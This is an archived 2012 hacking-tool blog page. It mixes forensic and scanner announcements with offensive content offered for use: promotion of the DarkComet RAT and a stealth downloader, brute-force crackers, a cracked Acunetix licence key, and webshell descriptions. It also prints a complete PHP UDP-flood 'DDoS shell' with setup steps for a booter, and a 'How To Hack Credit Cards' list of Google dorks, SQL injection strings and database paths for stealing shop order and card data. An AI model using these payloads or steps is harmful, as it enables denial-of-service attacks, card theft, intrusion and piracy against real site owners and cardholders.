border: 1px solid #d2d2d2; padding: 0px 8px 0px 8px; color: #a19999; font-size: 12px; height: 25px; width: 165px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; margin:0px; } .submitbutton{ background:#F66303; border: 1px solid #F66303; text-shadow: 1px 1px 1px #333; box-shadow: 3px 3px 3px #666; font:bold 12px Arial, sans-serif; color: #fff; height: 25px; padding: 0 12px 0 12px; margin: 0 0 0 5px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; cursor:pointer;}

Receive all updates via Facebook. Just Click the Like Button Below

You can also receive Free Email Updates:

Powered By Blogger Widgets

Related Posts Plugin for WordPress, Blogger...

Wednesday, June 13, 2012

Comet Beam v1.0 BETA



Description:
This little software will download a single or multiple files at the same time totally stealthly.


The stub is only (~24KiB) and packed (~14KiB).


WARNING: Like for DarkComet RAT this software is concidered as a Malware by your antivirus because it can be used to commit bad actions, in any case it contains viruses or related spywares.


Download Comet Beam v1.0 BETA

CAINE 2.5.1 (SuperNova) A GNU/Linux Live Distribution



CAINE (Computer Aided INvestigative Environment) is an Italian GNU/Linux live distribution created as a project of Digital Forensics 
Currently the project manager is Nanni Bassetti
CAINE offers a complete forensic environment that is organized to integrate existing software tools as software modules and to provide a friendly graphical interface.
The main design objectives that CAINE aims to guarantee are the following:
an interoperable environment that supports the digital investigator during the four phases of the digital investigation
a user friendly graphical interface
a semi-automated compilation of the final report
We recommend you to read the page on the CAINE policies carefully.
CAINE represents fully the spirit of the Open Source philosophy, because the project is completely open, everyone could take the legacy of the previous developer or project manager. The distro is open source, the Windows side (Wintaylor) is open source and, the last but not the least, the distro is installable, so giving the opportunity to rebuild it in a new brand version, so giving a long life to this project ....

CHANGELOG CAINE 2.5.1 "SuperNova"
Kernel 2.6-32.35 
ADDED:
ZFS Fuse 
exFat support 
Epiphany browser 
new mounter 
new TSK (Sleuthkit)
some fixings
New NAUTILUS SCripts 
ataraw 
bloom 
fiwalk 
xnview 
NOMODESET in starting menu 
xmount 
sshfs 
Reporting by Caine Interface fixed 
xmount-gui 
nbtempo 
fileinfo 
TSK_Gui 
Raid utils e bridge utils 
SMBFS
BBT.py
------------
Widows Side:
Wintaylor updated & upgraded


RBFstab and Mounter
1) "rbfstab" is a utility that is activated during boot or when a device is plugged.  It writes read-only entries to /etc/fstab so devices are safely mounted for forensic imaging/examination.  It is self installing with 'rbfstab -i' and can be disabled with 'rbfstab -r'.  It contains many improvements over past rebuildfstab incarnations.  Rebuildfstab is a traditional means for read-only mounting in forensics-orient distributions.
2) "mounter" is a GUI mounting tool that sits in the system tray.  Left clicking the system tray drive icon activates a window where the user can select devices to mount or un-mount.  With rbfstab activated, all devices, except those with volume label "RBFSTAB", are mounted read-only.  Mounting of block devices in Nautilus (file browser) is not possible for a normal user with rbfstab activated making mounter a consistent interface for users.
by John Lehr 
Live Preview Nautilus Scripts

CAINE includes scripts activated within the Nautilus web browser designed to make examination of allocated files simple. Currently, the scripts can render many databases, internet histories, Windows registries, deleted files, and extract EXIF data to text files for easy examination. The Quick View tool automates this process by determining the file type and rendering with the appropriate tool. 
The live preview Nautilus scripts also provide easy access to administrative functions, such as making an attached device writeable, dropping to the shell, or opening a Nautilus window with administrator privileges. The "Save as Evidence" script will write the selected file(s) to an "Evidence" folder on the desktop and create a text report about the file containing file metadata and an investigator comment, if desired. 
A unique script, "Identify iPod Owner", is included in the toolset. This script will detect an attached and mounted iPod Device, display metadata about the device (current username, device serial number, etc.). The investigator has the option to search allocated media files and unallocated space for iTunes user information present in media purchased through the Apple iTunes store, i.e., Real Name and email address. 
The live preview scripts are a work in progress. Many more scripts are possible as are improvements to the existing scripts. The CAINE developers welcome feature requests, bug reports, and critiques. 
The preview scripts were born of a desire to make evidence extraction simple for any investigator with basic computer skills. They allow the investigator to get basic evidence to support the investigation without the need of advanced computer forensics training or waiting upon a computer forensics lab. Computer forensics labs can used the scripts for device triage and the remainder of the CAINE toolset for a full forensic examination! 
John Lehr
-------------
CASPER PATCH
The patch changes the way how Casper searches for the boot media. By default, Casper will look at hard disk drives, CD/DVD-drives and some other devices while booting the system (during the stage when system tries to find the boot media with correct root file system image on it - because common bootloaders do not pass any data about media used for booting to an operating system in Live CD configurations). Our patch is implemented for CD/DVD versions of CAINE and enables CD/DVD-only checks in Casper. This solves the bug when Casper would select and boot fake root file system images on evidentiary media (hard disk drives, etc). ------------
Suhanov Maxim


DOWNLOAD CAINE 2.5.1 - SUPERNOVA

DarkComet RAT 5.3 Final


The final version of DarkComet RAT 5.3 is out, and don't worry guy's it still the beginning of this 4 years project (already), DarkCoderSc have a lot of ideas / works to implement to this project for his next versions/ generations also i'm still working in a lite version even if in this version you already can lift functions you don't wan't to use using a new functionality in client settings.
Also VertexNet is not dead, it should rebirth soon as i have more free time and some other big projects to finalize, VertexNet will be totally recoded and of course Linked to the DarkComet RAT.
[Change for 5.3.1 FIX 1]
- New action added in FTP Client, you can copy to clipboard the link of a file (useful for file downloader (URL))
- A very huge bug was fixed for stub startup, now it works fine 
- A bug fix when using user list thumbnails

Screenshot :













[Curent Changes 5.3]
- [FIX ] HTTP Flood more efficient
- [FIX ] In settings the last theme is correctly set in the combobox
- [FIX ] Auto SIN Refresh ratio successfully saved in config.ini
- [GUI ] Client Settings GUI changed, it is now more user friendly and fit with the rest of DarkComet RAT Design
- [GUI ] EULA At startup is more beautiful
- [GUI ] No IP Gui revised
- [GUI ] User group Gui revised
- [FUNC] Search for update added in settings
- [GUI ] Keylogger GUI revised
- [FIX ] Now desktop correctly save snapshots (if option enabled)
- [DEL ] Delete in full editor (read only, archived, tempory) attributes to avoid some stub problems if used
- [FIX ] Users list flags support now Serbia Country (Republic of Serbia)
- [FIX ] VIP Lounge price and URL fixed
- [FUNC] HOT, Now you can chose wich functions you need in the control center, and not be bloated with functions you might never used. (In settings window)
- [FIX ] FTP Upload Keylogger Logs bug fixed
- [FUNC] FTP Wallet added in settings, it allow you to setup and test your FTP accounts for compatible DarkComet RAT FTP Functions
- [FUNC] FTP Wallet is now linked to the Edit Server keylogger FTP Managment
- [FUNC] Now you can upload files from file manager to one of your FTP account (compatible with the FTP Wallet)
- [FUNC] Embedded FTP Client added to DarkComet, multithread using Pure API, very fast and reliable and of course user friendly.
- [FIX ] Bug fixed when module startup enable, no more tons of process on reboot etc.. support Drag n Drop
- [FUNC] Drag And Drop added in File Manager to upload files frop explorer directly to remote computer
- [FUNC] New downloader method implemented using Pure low level API's instead of the shit URLDownloadUrlToFile bloated of crap
- [FUNC] File Downloader manager from control center been improved and bug fixed, now file are correctly downloaded, also you can chose a PATH from combobox shortcut
- [FUNC] Mass downloader from user list been improved and multithreaded, also download bug is now fixed
- [FUNC] Same as for mass downloader, update from URL bug fixed and improved

DOWNLOAD DarkComet RAT 5.3 Final


BFT- Browser forensic tool


This software is an advanced local browser history search engine, in less than few seconds it will extract the chosen keywords of most famous web browser, actually Internet Explorer, Google Chrome, Mozilla FireFox and Opera.
The program will attempt to find the keyword(s) in the history title and search, if the keyword is present or suspected to be, it will be display in the result list with his URL and Title.
The software also give you the possibility to edit the default keywords and of course add / modify your own keywords, to separate keywords subject you can create your own keywords categories and only scan for some keywords in the chosen category .
The program is fully asynchronous so it won't affect your work during the scan time nor it will block the customization of keywords and keylist and can be canceled at anytime.
Notice that this software will in any case alter the data, it will just open in read only and in background all history even if archived.
This software was coded by DarkCoderSc (Jean-Pierre LESUEUR) using Delphi XE (Object Pascal IDE) and is fully FREE. Feel free to contact me for giving a feedback and report bugs or suggestions. 




Acunetix Web Vulnerability Scanner 8 BETA




As the BETA program for Acunetix Web Vulnerability Scanner 8 keeps gaining momentum, all the great feedback received from our BETA participants has helped us achieve the BETA 2 milestone. This brings a significant number of improvements to WVS 8, including new usability features, component enhancements, and a series of bug-fixes.


WVS 8 BETA 2 Change Log
The following updates have been included in the BETA 2 build of WVS 8:


Featured Improvements
Additional .NET AcuSensor support for .NET versions 3, 3.5, 4
Improved blind SQL injection timing tests for PostgreSQL
Improved blind SQL injection timing tests for request-timeout situations
Logs are now flushed to the log-file every 10 seconds when running in console mode
Scheduler feature: notification bar appears if the connection with the server is lost
Bug Fixes
Crash (runtime passive analysis) when “Disable Crawler Aerts” option is enabled
Problem with logging of HTTP_Anomalies when running multiple instances
Problem with writing to temp folder when running multiple instances
Issue with saving application logs to an invalid folder when running the Scheduler
Crash when multiple instances of WVS try to detect custom 404 error-page patterns
Scan does not resume correctly when the Scheduler automatically resumes a scan
Issue with retest functionality for web application scripts
Proxy crash, commonly when the process is already executing
Settings in use by another instance cannot be saved as a Scan Settings Template
Reporter crash when the text in the alert details is too long
Periodical vulnerability reports show incorrect publishing date
Database ID allocation is now synchronized between multiple WVS instances
Scan results cannot be download from the Scheduler since Internet Explorer 7 cache is not used
HTML report format is missing from the Scheduler web interface
Installer assigns full permissions to the license file (non-admin users receive an error when scanning)
Fixed the Scheduler’s Add Scan dialog on Internet Explorer 9
Errors related to a browser-tab do not appear if a different tab is being viewed
Malfunction with some Advanced Penetration testing tools when used through a proxy server
XSS tests are no longer case-sensitive
Scheduler returns invalid error message when connecting to password-protected applications
Scheduler not scanning password-protected applications
Crash with AcuSensor for .NET
False positives are saved for each user instead of globally
Changes to application settings not synchronized across multiple instances
Typos in UI
Reporter RTF-export malfunction
Reporter sets incorrect filename for exported and saved reports
Text wrap working inconsistently across reports

The Acunetix WVS Version 8 user manual is available in PDF Format and also in HTML Format.


Download Acunetix WVS Version 8 BETA

Tuesday, June 12, 2012

DPScan Drupal Security Scanner


The First Security scanner for Drupal CMS has been released by Ali Elouafiq, on his Blog. His team develop a tool that will enumerate at least the modules used by Drupal so we can simulate a White Box audit on our private machines.


This small tool is public and accessible to you for use however you please. It may help other auditors or penetration testers do their job faster, Here is a little demonstration. After downloading the script (in python), you simply type:
> python DPScan.py [website url]


Download Drupal Security Scanner 

ACUNETIX WEB VULNERABILITY SCANNER VERSION 8 + PATCH (CRACK) FULL

Worlds best and most popular Vulnerability scanner full version download


Features At a Glance :- 
* Manipulation of inputs from URLs:
Acunetix WVS can automatically identify URL parameters and manipulate them to detect vulnerabilities. This technology is not present in any other competing vulnerability scanner.
Replace manual intervention with scanner intelligence
* Automatic custom 404 error page identification:
Acunetix WVS 8 can automatically determine if a custom error page is in use, and recognizes it without needing any recognition patterns to be configured before the scan.
Interpret IIS 7 rewrite rules automatically
Using the web application’s web.config file, WVS 8 can automatically interpret rewrite rules without requiring any manual input.
Fix vulnerabilities while locking hackers out
* Imperva Web Application Firewall integration:
An exciting co-operation between Imperva and Acunetix; WVS 8 scan results can be imported into an Imperva Web Application Firewall and interpreted automatically as firewall rules.
Use WVS 8 as a true security scanning workhorse
* Multiple instance support:
Acunetix WVS 8 can be relaunched as multiple instances on the same machine, allowing the user to scan multiple websites enabling further support for multi-user scenarios on the same server/workstation.
Re-scan without re-configuring
* Scan settings templates:
WVS 8 can save the settings for the scan of a specific application as a template, making it quick and easy to recall those exact settings for the same application each time it is scanned. This is particularly useful when auditing multiple sites, enabling the user to load the template for each site instead of re-configuring everything manually.
Launch a scan quicker than before
* Simplified Scan Wizard:
In addition to the introduction of Scan Settings Templates and automatic custom 404 error page recognition, the Scan Wizard contains far less options so it’s much easier and quicker to kick off a scan.
Access your results from anywhere and everywhere
* Web-based scheduler:
Accessible via a web interface, the new Scheduler allows administrators to download scan results from any workstation, laptop, or smartphone. The new Scheduler will automatically launch another instance of WVS when multiple web scans are due, preventing multiple processes from depending on the resources of one WVS instance, and thereby allowing scans to complete in less time.
Identify threats unseen by other black-box scanners
* New HTTP Parameter Pollution vulnerability class:
At the time of writing, Acunetix WVS 8 is the only scanner that tests for this security vulnerability.
Ensure complex scans will complete automatically and successfully
* Smart memory management:
The following settings have been added to optimise scanning efficiency:
Define number of files per directory
Limit number of subdirectories per website
Assign Crawler memory limit
Other New Features:-
Real time Crawler status (number of crawled files, inputs discovered, etc.)
Support for custom HTTP headers in automated scans
Configurable log file retention
Detailed Crawler coverage report
Scan status included in report


Steps to get full version of Acunetix web scanner v8 for free
At First got to this link and download acunetix scanner
ID: acunetixwvsfullv8
Password: nFu834!29bg_S2q
Then install it and Open patch and click on patch


Now open Acunetix you will be asked for some details
Enter below details
License Key: 2e3b81463d2s56ae60dwe77fd54f7d60
Name: Hmily/[LCG]
ComPany: Www.52PoJie.Cn
Email: Hmily@Acunetix.com
Telephone: 110


Download PATCH (CRACK)

Mirror

Mirror

Sunday, June 10, 2012

How To Install Android 4.0 VirtualBox




The mobile smartphone and tablet industry seems to have a very prominent divide, with a lot of consumers having their favorite operating system and choosing to stick to hardware which is powered by their chosen OS. Obviously fans of Apple’s iOS use the iPhone and iPad devices, whereas Android lovers have a wide range of hardware to choose from due to the fact that the OS is available to multiple manufacturers.But what happens if you are a die hard fan of iOS, or Windows Phone but you still want to sample the delights that Android Ice Cream Sandwich has to offer? I personally am an iPhone user for the last five years and will continue to be for the foreseeable future. But after recently getting my first taste of Android, I am severely tempted to shell out for a second device so I can have the benefits that both provide. For those that can’t, or won’t, purchase a second device then why not run Android 4.0 in virtualization on your desktop or laptop in order to see the Ice Cream Sandwich experience first hand? Android 4.0 is an operating system in its own right, but instead of running on a dual boot setup, we install and run ICS within a free of charge virtualization application known as VirtualBox. VirtualBox runs like any other application or program on your machine, but offers the benefits of being able to install a secondary OS within it which can be invoked quickly by the user. For all those die hard iOS and Windows Phone fans out there, this is a perfect way to experience the delights of Android.
Are you ready for a whirlwind journey down Ice Cream Sandwich lane? Buckle in and follow the simple steps below.

Step 1: Head over to the official Oracle VM VirtualBox site and download the relevant VirtualBox binary for your computers operating system (Windows/Mac OS X/Linux/Solaris).

Step 2: Find the saved location of the downloaded VirtualBox binary and install as you would with any other native application making sure to follow all on screen prompts and instructions.


Step 3: Head on over to the VMLite website and download a copy of the Ice Cream Sandwich which has been preconfigured for virtualization and features seamless mouse support for navigation. The download weighs in at 88MB in size so may take a while to download depending on your connection.



Step 4: Locate the downloaded ‘Android-v4.7z‘ file and extract the contents from within.



Step 5: Once the Android-v4.7z file has been opened, locate a file from within the archive called ‘Android-v4.vbox‘ which as you can tell by the file extension is a pre configured VirtualBox file.

Step 6: Double click on the Android-v4.vbox file which will load the VirtualBox application and boot up the ICS file.



Step 7: When the boot menu is presented in VirtualBox, press ‘start‘ on the top toolbar and then if required select the ‘Android Startup from /dev/sda‘ option.


Step 8: All steps are complete. Android 4.0 ICS should now be booting up allowing you to enjoy that Android goodness.

Windows and Linux users may find that an alternative, specific version Android 4.0 may be required, which can be found by visting the Android-x86 page. The performance of the Android ICS virtual installation will obviously not be as smooth as intended on an actual device built for purpose, but it does give a feel of the OS with apps being able to launch as well as widget customization.

Thursday, June 7, 2012

BRUTER (BINARY + SOURCE) WEB FORM/FTP/POP3/VNC/SMTP/MYSQL/IMAP/HTTP CRACKER



Bruter is a parallel network login brute-forcer on Win32. This tool is intended to demonstrate the importance of choosing strong passwords. The goal of Bruter is to support a variety of services that allow remote authentication.

Here Home Page: http://worawita.sourceforge.net/



Download

CAT Beta 4.0 PENTESTING TOOL


CAT is designed to facilitate manual web application penetration testing for more complex, demanding application testing tasks. It removes some of the more repetitive elements of the testing process, allowing the tester to focus on individual applications, thus enabling them to conduct a much more thorough test. Conceptually it is similar to other proxies available both commercially and open source, but CAT provides a richer feature set and greater performance, combined with a more intuitive user interface.

There are a number of differences between CAT and currently available web proxies. They include:
CAT uses Internet Explorer’s rendering engine for accurate HTML representation
It supports many different types of text conversions including: URL, Base64, Hex, Unicode, HTML/XML, SQL and JavaScript no quotes
It offers integrated SQL Injection and XSS Detection
Synchronised Proxies for Authentication and Authorisation checking
Faster performance due to HTTP connection caching
SSL Version and Cipher checker using OpenSSL
Greater flexibility for importing/exporting logs and saving projects
Tabbed Interface allows for multiple tools at once e.g. multiple repeaters & different logs
The ability to repeat and modify a sequence of requests (particularly useful in SSO testing)
It’s free


Here is home page: http://www.contextis.com/


Download CAT Beta 4.0

WIFFY 0.2 AUTOMATED WIFI HACKER





Runs only in Linux/Mac


This is Automated WiFi Hacker


Download



How To Shell A VPS Tutorial






In this tutorial you will learn how to shell a VPS so that you can then add it to your Shell Booter, etc.


Step 1
You are going to need to buy a VPS. Once you have done that install this OS centos-6-x86


Step 2
Login to your VPS now via PuTTy.
Type: yum install http


Then type y and hit enter if it prompts you to do so. Now once that is done.


Type: yum install php
Then type y and hit enter if it prompts you to do so.


Step 3
Download WinSCP and then login to it with your VPS. Once their you will be at the root directory.




Step 4
Click the 2 dots at the top



Step 5
Now go to the bottom and click var.
Click image to enlarge




Step 6
Now click www.
Click image to enlarge



Step 7
Now click html.
Click image to enlarge



Step 8
Once you are their now create a new file and call it shell.php when a new box opens copy and paste this.


<?php
$ip = $_SERVER['REMOTE_ADDR'];
?>


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> 
<title>+DDoS Shell</title>
<center> 
<body background="http://i701.photobucket.com/albums/ww12/skyw09/matrix-gradient.gif">
<font color="FF3636"> 
<font size= "6">
<font size="5">
<pre> 


</pre> 
<b>Your IP:</b> <font color="blue"><?php echo $ip; ?></font>&nbsp;(Don't Hit yourself)<br><br><font color="red">
</font>
<STYLE> 
input{ 
background-color: white; font-size: 10pt; color: black; font-family: Tahoma; border: 1 solid #66; 

button{ 
background-color:# FF0303; font-size: 8pt; color: black; font-family: Tahoma; border: 1 solid #66; 

body { 



</style> 
<?php 
//UDP 
if(isset($_GET['host'])&&isset($_GET['time'])){ 
$packets = 0; 
ignore_user_abort(TRUE); 
set_time_limit(0); 


$exec_time = $_GET['time']; 


$time = time(); 
//print "Started: ".time('d-m-y h:i:s')."<br>"; 
$max_time = $time+$exec_time; 


$host = $_GET['host']; 


for($i=0;$i<65000;$i++){ 
$out .= 'X'; 

while(1){ 
$packets++; 
if(time() > $max_time){ 
break; 

$rand = rand(1,65000); 
$fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5); 
if($fp){ 
fwrite($fp, $out); 
fclose($fp); 


echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n"; 
echo '<br><br> 
<form action="'.$surl.'" method=GET> 
<input type="hidden" name="act" value="phptools"> 
Host: <br><input type=text name=host><br> 
Length (seconds): <br><input type=text name=time><br> 
<input type=submit value=Go></form>'; 
}else{ echo '<br><b>UDP Flood</b><br> 
<form action=? method=GET> 
<input type="hidden" name="act" value="phptools"> 
Host: <br><input type=text name=host value=><br> 
Length (seconds): <br><input type=text name=time value=><br><br> 
<input type=submit value=Go></form>'; 

?> 
<marquee behavior="scroll" direction="right"><font color="limegreen"><center><strong>Don't over use this shell if you do i will no long release shells</strong></font></marquee>
<marquee behavior="scroll" direction="left"><font color="blue"><center><strong>Welcome To +DDoS Shell</strong></font></marquee</center> 
</body> 
</html>


Then hit save. A box should appear asking for your password, enter it. You can change that to another shell, but I'm going to use this one.
Step 9
Now open your web-browser and type your VPS's IP + /shell.php on the end.
e.g. 1.1.1.1/shell.php


Where Not To Buy VPS's For DoS Attacks
1. Santrex
2. Whitelabel
3. Rethinkvps
4. 123com (they take forever to send the VPS)
5. nqhost
6. alibabahost
7. hosthatch

404 PHP PRIVATE ERROR SHELL




A Nice Shell which makes others to feel that there is no shell. A Simple Css Hack which feels that there is 404 :).
Feel free to modify with credits. 
For more information see the GIF Animation above.


pass:HACKED



Download 

ShellDetect v1.0 - Shell Tool Detection Codes



Detect Shell is a tool developed by Amit Malik for the presence of  Shell Codes within a file or network traffic. With it you can analyze binary (as generated by Metasploit for example) or files to a network stream (capturing traffic with tcpdump / wireshark ).


Today attackers distribute malicious files containing Shell Codes hidden. When you open these files, the Shell Code run in silence , which compromises the integrity of the system. This is more dangerous when the operation is " Zero Day " , and not be detected by the signature traditional of anti-virus . In these cases ShellDetect help to identify the presence of Shell Codes and assist in the task of keeping the system safe .

To run ShellDetect need to install Python also recommend running it on a virtual machine
( VMware / VirtualBox ) as the tool is still very beta and Shell escape him even more advanced Codes, but the important thing is to detect those of Metasploit which are the most used.



 The use of the tool is very easy (and for now just runs under Windows XP ), simply use the console: ShellDetect.py file_name and parses the file or the network traffic captured.

First analyzing a file (pgeneric-12.txt), then network traffic captured (network_stream).
As I said above, the tool is in beta, but I find it very useful and I see enough future.

More information: http://securityxploded.com/shell-detect.php

ShellDetect Download v1.0 

[XTSCrack] audit tool RDP (Remote Desktop)



Well, the truth is that much has been said of the vulneravilidad in the Windows Remote Desktop (RDP) ( MS12-020 - Critical ) that was initially believed that one could execute arbitrary code on the attacked computer, but in the end could only generate a single BSoD (blue screen), so it was classified as a DoS. And really I do not draw much attention to a DoS, so as it is both mouth RPD (remote desktop) I bring a pretty good tool is to audit rather than throw it away.


xTSCrack audit is a tool of RDP with the basic functions of an auditor of services. You can scan an IP or a range and allows for brute force attacks and userlist wordlist, but a user and a wordlist, or a password and a userlist.



Download xTSCrack 0.9 

* (It has support for Windows systems only)

Official Website: http://atrixteam.blogspot.com

Patator - Multi-Purpose Tool to Brute Force


Patator is a tool (python script) multi-purpose brute force, this tool is born of the boredom of using other tools for creative brute force known as Medusa , Hydra , ncrack , auxiliary modules Metasploit , scripting Nmap NSE and the like because:
Or do not work or are unreliable (false negative on several occasions).
They are slow (not multi-threaded or multiple passwords tested in the same TCP connection).
Lack of useful features offered by Python (eg interactive runtime).

Therefore Patator is a good option if you are disappointed in Medusa, Hydra, ncrack, etc ... FB and other tools, as it offers:
Do not write the same code over and over again.
Run multiple threads.
Benefit from useful features such as run-time commands interactively, the response record, etc 

Currently supports the following modules:

 * Ftp_login: FTP Brute-force
 * Ssh_login queue: Brute-force SSH
 * Telnet_login: Telnet Brute-force
 * Smtp_login: Brute-force SMTP
 * Smtp_vrfy: Enumerate valid users using the SMTP VRFY command
 * Smtp_rcpt: Enumerate valid users using the SMTP RCPT TO command
 * Http_fuzz: Brute-force HTTP / HTTPS
 * Pop_passd: Brute-force poppassd (not POP3)
 * Ldap_login: Brute-force LDAP
 * Smb_login: SMB Brute-force
 * Mssql_login: Brute-force MSSQL
 * Oracle_login: Brute-force Oracle
 * Mysql_login: Brute-force MySQL
 * Pgsql_login: Brute-force PostgreSQL
 * Vnc_login: Brute-force VNC
 * Dns_forward: Forward lookup subdomains
 * Dns_reverse: Reverse lookup subnets
 * Snmp_login: Brute-force SNMPv1 / 2 and SNMPv3
 * Unzip_pass: Brute-force the password of encrypted ZIP files
 * Keystore_pass: Brute-force the password of Java keystore files

Note that it is tool is not recommended for people who are bored with Medusa, Hydra ... for not knowing how to use them, is just if not given the expected result. The author leaves a note saying that this tool is NOT script-kiddie-friendly , since its operation requires many more variables than other tools for that too is more effective.

In the author's website make it clear how to use it, I will not include here how to use it as I am informed of the tool and I'm not doing your manual.


FOCA 3.0 a tool to extract information in footprinting and fingerprinting



FOCA is a tool for carrying out processes of gathering information on fingerprinting and audit work site. Free version makes finding servers, domains, URLs and documents published, as well as the discovery of versions of software on servers and clients. FOCA became famous for extracting metadata of public documents, but today is much more than that. You can get more 


information about FOCA on the following links:


http://www.darkreading.com/blog/227700505/foca-and-the-power-of-metadata-analysis.html
https://www.infosecisland.com/blogview/6707-Metadata-Analysis-With-FOCA-25.html
http://www.securitytube.net/video/1353
http://www.youtube.com/watch?v=Ou4TRvzYpVk
http://www.youtube.com/watch?v=r3K7V4LL8yk
http://www.youtube.com/watch?v=l9R_m7TI-7A


Version 3.0 was released and is ready for download:


FOCA 3.0 Download


They can also download it getting into  http://www.informatica64.com/foca.aspx  and registering your email.

Metasploit on an Apple TV 2G



A tutorial in which you specify how to install and run Metasploit on an Apple TV 2G.  Apple TV is a media center that can connect to your television and through it access various multimedia content such as photos, movies, TV, radio and videos online.


The installation is very similar to most facilities in an Apple device, but never fails to be useful for someone with an Apple TV.


Download pdf

12309.php: An Advanced Webshell!



I am covering most of the interesting web shells that we are aware of. 12309.php (yes, this is the name!) caught our attention for a number of reasons. Before we get to those, feel free to read about two of our favourite stealth PHP backdoors – weevely and WeBaCoo.


So, 12309.php is an advanced webshell with the main aim at executing shell commands in all possible ways. It obviously has been coded in PHP and is released with a 3-clause BSD license. In addition to executing shell commands, it has a lot of interesting features as under. 12309.php also allows you to read files with mysql!


Features of 12309.php:


You could choose desired function to execute code with (+pcntl_exec, +ssh2_exec)
Internal Perl, Python and SSI mini-webshells – save them to disk and run, if PHP system functions are disabled
Backconnect/bind port on PHP, Python, and “classic” perl and C backconnect/bind. Also there are several small one-line backconnects on different languages, useful too coz they do not need to save temporary file somewhere
Fully interactive backconnect on Python (yes, you can run even vim & mc via backconnect!)
On old PHP versions (such as 5.1.6, 5.2.9) this script could bypass open_basedir and read other users` files (if you`re running it with webserver`s rights, i.e. kind of apache-mpm-prefork or -worker, not kind of -itk or -peruser, and if your account is not in chroot/jail). Also there is ability to read files with mysql and with usual file_get_contents
Nice extra functions (file manager, file editor, system info, text coders/decoders, local open ports scanner, etc)
Now, what we liked about this webshell is that you can use pcntl_exec or ssh2_exec methods to execute files. pcntl_exec is a thin wrapper around the execve() function that runs programs in the current process space. This means that the program that you launch runs normally, with the same PID as PHP had before it called pcntl_exec(), but it replaces the PHP process entirely! With ssh2_exec – another execution option included with 12309.php - you can execute a command on a remote server! Another thing that we like about 12309.php is that if the PHP subsystem denies access to your favourite commands, you can try and execute the included Perl, Python or Server Side Includes (SSI) shells. Albeit they will have a limited functionality compared to 12309.php, but something is better than nothing right? If on stealth features like WeBaCoo and Weevely were added to this one. The backconnect feature could help you under some circumstances. Just that 12309.php traffic could occur on uncommon ports and be detected.


Download 12309.php

How To Hack Credit Cards - Dorks+Exploit+Using+Easy Explain



Most of these are outdated but they can still work if you happen to find a vulnerable site:



1:
google dork :--> inurl:"/cart.php?m="
target looks lile :--> http://xxxxxxx.com/s...cart.php?m=view
exploit: chage cart.php?m=view to /admin
target whit exploit :--> http://xxxxxx.com/store/admin
Usename : 'or"="
Password : 'or"=

2:
google dork :--> allinurlroddetail.asp?prod=
target looks like :--> www.xxxxx.org/proddetail.asp?prod=XXXX (big leters and numbers )
exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
target whit exploit :--> www.xxxxxx.org/fpdb/vsproducts.mdb


3:
google dork :--> allinurl: /cgi-local/shopper.cgi
target looks like :--> http://www.xxxxxx.co....dd=action&key=
exploit :--> ...&template=order.log
target whit exploit :--> http://www.xxxxxxxx.....late=order.log


4:
google dork :--> allinurl: Lobby.asp
target looks like :--> www.xxxxx.com/mall/lobby.asp
exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb
target whit exploit :--> www.xxxxx.com/fpdb/shop.mdb


5:
google dork :--> allinurl:/vpasp/shopsearch.asp
when u find a target put this in search box
Keyword=&category=5); insert into tbluser (fldusername) values
('')--&SubCategory=&amp;hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername=''--&SubCategory=All&amp;action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&amp;category=5); update tbluser set fldpassword='' where
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6


login page: http://xxxxxxx/vpasp/shopadmin.asp


6:
google dork :--> allinurl:/vpasp/shopdisplayproducts.asp
target looks like :--> http://xxxxxxx.com/v....asp?cat=xxxxxx
exploit :--> http://xxxxxxx.com/vpasp/shopdisplay...20union%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'-
if this is not working try this ends
%20'a%25'--
%20'b%25'--
%20'c%25'--
after finding user and pass go to login page:
http://xxxx.com/vpasp/shopadmin.asp


7:
google dork :--> allinurl:/shopadmin.asp
target looks like :--> www.xxxxxx.com/shopadmin.asp
exploit:
user : 'or'1
pass : 'or'1

8:
google.com :--> allinurl:/store/index.cgi/page=
target looks like :--> http://www.xxxxxx.co....short_blue.htm
exploit :--> ../admin/files/order.log
target whit exploit :--> http://www.xxxxxxx.c....iles/order.log

9:
google.com:--> allinurl:/metacart/
target looks like :--> www.xxxxxx.com/metacart/about.asp
exploit :--> /database/metacart.mdb
target whit exploit :--> www.xxxxxx.com/metacart/database/metacart.mdb

10:
google.com:--> allinurl:/DCShop/
target looks like :--> www.xxxxxx.com/xxxx/DCShop/xxxx
exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
target whit exploit :--> www.xxxx.com/xxxx/DCShop/orders/orders.txt or www.xxxx.com/xxxx/DCShop/Orders/orders.txt


11:
google.com:--> allinurl:/shop/category.asp/catid=
target looks like :--> www.xxxxx.com/shop/category.asp/catid=xxxxxx
exploit :--> /admin/dbsetup.asp
target whit exploit :--> www.xxxxxx.com/admin/dbsetup.asp
after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
target for dl the data base :--> www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
in db look for access to find pass and user of shop admins.


12:
google.com:--> allinurl:/commercesql/
target looks like :--> www.xxxxx.com/commercesql/xxxxx
exploit :--> cgi-bin/commercesql/index.cgi?page=
target whit exploit admin config :--> http://www.xxxxxx.co..../admin_conf.pl
target whit exploit admin manager :--> http://www.xxxxxx.co....in/manager.cgi
target whit exploit order.log :--> http://www.xxxxx.com....iles/order.log

13:
google.com:--> allinurl:/eshop/
target looks like :--> www.xxxxx.com/xxxxx/eshop
exploit :-->/cg-bin/eshop/database/order.mdb
target whit exploit :--> http://www.xxxxxx.co....base/order.mdb
